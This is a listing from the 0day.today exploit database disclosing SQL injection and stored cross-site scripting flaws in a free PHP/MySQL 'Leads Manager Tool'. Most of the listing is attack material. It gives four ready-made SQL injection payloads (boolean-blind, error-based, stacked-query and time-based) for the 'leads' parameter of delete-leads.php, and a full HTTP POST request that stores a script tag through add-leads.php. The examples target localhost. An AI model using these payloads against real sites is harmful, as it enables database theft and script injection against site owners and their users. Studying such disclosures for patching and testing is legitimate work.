[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Leads Manager Tool SQL Injection / Cross Site Scripting Vulnerabilities

Author
OoN_Boy
Risk
[
Security Risk High
]
0day-ID
0day-ID-39704
Category
web applications
Date add
07-08-2024
Platform
php
[x]========================================================================================================================================[x]
 | Title        : Leads Manager Tool SQL & XSS[stored)] Vulnerabilities
 | Software     : Leads Manager Tool Using PHP and MySQL with Source Code
 | Create By  : https://www.sourcecodester.com/users/remyandrade
 | First Release: 25/01/22
 | Download     : https://www.sourcecodester.com/php/17510/leads-manager-tool-using-php-and-mysql-source-code.html
 | Date         : 30 Agustus 2024
 | Author       : OoN_Boy
[x]========================================================================================================================================[x]
 | Technology       : PHP
 | Database         : MySQL
 | Price            : FREE
 | Description      : Leads Manager Tool, a comprehensive web application designed to streamline the process of managing business leads. Built with the power of PHP and MySQL, this tool offers a seamless and user-friendly experience for storing, updating, and organizing lead information
[x]========================================================================================================================================[x]

[O] Exploit
  
  http://localhost/leads-manager-tool/endpoint/delete-leads.php?leads=[SQL]
  http://localhost/leads-manager-tool/endpoint/add-leads.php
    
[O] Proof of concept

  [SQL]
  Parameter: leads (GET)  
  Type: boolean-based blind
  Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  Payload: leads= --emurate' RLIKE (SELECT (CASE WHEN (8305=8305) THEN 0x202d2d656d7572617465 ELSE 0x28 END))-- rUwl

  Type: error-based
  Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  Payload: leads= --emurate' OR (SELECT 1382 FROM(SELECT COUNT(*),CONCAT(0x7162787171,(SELECT (ELT(1382=1382,1))),0x7176706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vKls

  Type: stacked queries
  Title: MySQL >= 5.0.12 stacked queries (comment)
  Payload: leads= --emurate';SELECT SLEEP(5)#

  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: leads= --emurate' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))fAev)-- ZNBt
  
  [XSS]  
  POST /leads-manager-tool/endpoint/add-leads.php HTTP/1.1
  Host: 127.0.0.1
  Accept-Encoding: gzip, deflate, br
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US;q=0.9,en;q=0.8
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
  Connection: close
  Cache-Control: max-age=0
  Origin: http://127.0.0.1
  Upgrade-Insecure-Requests: 1
  Referer: http://127.0.0.1/leads-manager-tool/
  Content-Type: application/x-www-form-urlencoded
  Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="126", "Chromium";v="126"
  Sec-CH-UA-Platform: Windows
  Sec-CH-UA-Mobile: ?0
  Content-Length: 85

  leads_name=Vrs<script>alert(1)</script>Hck&email_add=vrs-hck@maho.id&phone_number=911-911-9111

#  0day.today [2024-12-23]  #